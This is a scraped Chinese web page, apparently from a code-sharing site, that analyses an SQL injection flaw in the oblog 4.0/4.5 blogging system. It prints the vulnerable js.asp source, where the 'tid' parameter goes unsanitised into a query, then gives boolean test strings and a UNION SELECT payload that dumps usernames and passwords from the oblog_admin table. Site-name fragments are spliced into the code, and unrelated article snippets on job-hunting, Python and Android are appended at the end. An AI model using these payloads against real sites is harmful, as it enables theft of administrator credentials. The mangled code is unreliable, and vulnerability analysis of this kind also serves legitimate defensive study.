**:deepen study
漏洞檔案:js.asp
dim oblog
set oblog=new class_sys
oblog.autoupdate=false
oblog.start
dim js_blogurl,n
js_blogurl=trim(oblog.cacheconfig(3))
n=cint(request(」n」))
if n=0 then n=1
select case cint(request(」j」))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
case 11
call show_hotblog()
case 12
call show_teams()
case 13
call show_posts()
case 14
call show_hottag()
case 0
call showlog()
end select
****************省略部分********************
sub show_posts()
dim teamid,postnum,l,u,t
teamid=request(」tid」)
postnum=n
l=cint(request(」l」))
u=cint(request(」u」))
t=cint(request(」t」))
dim rs,sql,sret,saddon
sql=」select top 」 & postnum & 」 teamid,postid,topic,addtime,author,userid from oblog_teampost where idepth=0 and isdel=0 」
if teamid<>「」 and teamid<>「0″ then
teamid=replace(teamid,」|」,」,」)
sql=sql & 」 and teamid in (」 & teamid & 「) 」
end if
sql=sql & 」 order by postid desc」
set rs=oblog.execute(sql)
sret=」
」 do while not rs.eof
saddon=」"
* sret=sret & 「 」 & oblog.filt_html(left(rs(2),l)) & 「」
if u=1 then saddon=rs(4)
if www.cppcns.comt=1 then
if saddon<>「」 then saddon=saddon & 「,」
saddon=saddon & rs(3)
end if
if saddon<>「」 then saddon=」(」 & saddon & 「)」
sret=sret & saddon & 「
」 rs.movenext
loop
set rs = nothing
sret=sret & 程式設計客棧「
」 response.write oblog.htm2js (sret,true)
end sub
呼叫show_posts()過程必須要符合上面的引數n=1,j=13
(」 & teamid & 「)
htwww.cppcns.comtp: and 1=1 and (1=1 返回正常
) and 1=1 and (1=2 返回異常
猜管理員表名
) and 查詢語句 and (1=1
sql=」select top 」 & postnum & 」 teamid,postid,topic,addtime,author,userid from oblog_teampost where idepth=0 and isdel=0 」
) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
documenwww.cppcns.comt.write('
*tyddhxnay
『);
gid=1跟pid=2裡的1,2就是了 直接替換裡面的1,2為username,password
) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
本文標題: oblog4.0 oblog4.5漏洞利用分析
本文位址:
40 老人求職記錄 4
前面講的都是不好的,我都把公司名字隱去了,不是抱怨,是想給自己乙個記錄吧。也是給大家乙個參考,說不定就遇到這些問題了。現在講講好的經歷。我手裡offer中一直最想去的一家,雖然現在大家都說他們未來發展堪憂,雖然過去幾年很火,但是我還是蠻想去的。面試的時候,leader說的一句話,我蠻感慨的。他說,他...
40 類和物件4(BIF)
一 判斷類 子類 物件關係的bif 1.issubclass class,classinfo 返回布林型 classinfo可以是類物件組成的元組,只要class與其中任何乙個候選類的子類一致,就返回true class a pass class b a pass issubclass b,a tr...
日常收穫4 Android4 0全屏實現
解決方案 用於我需要實現全屏顯示,而該包下面並沒有關於全屏顯示的style型,所以將繼承類改為activity就可以解決。ps全屏顯示我用的是在androidmanifest.xml下除錯,加上如下語句 android theme android style theme.notitlebar.ful...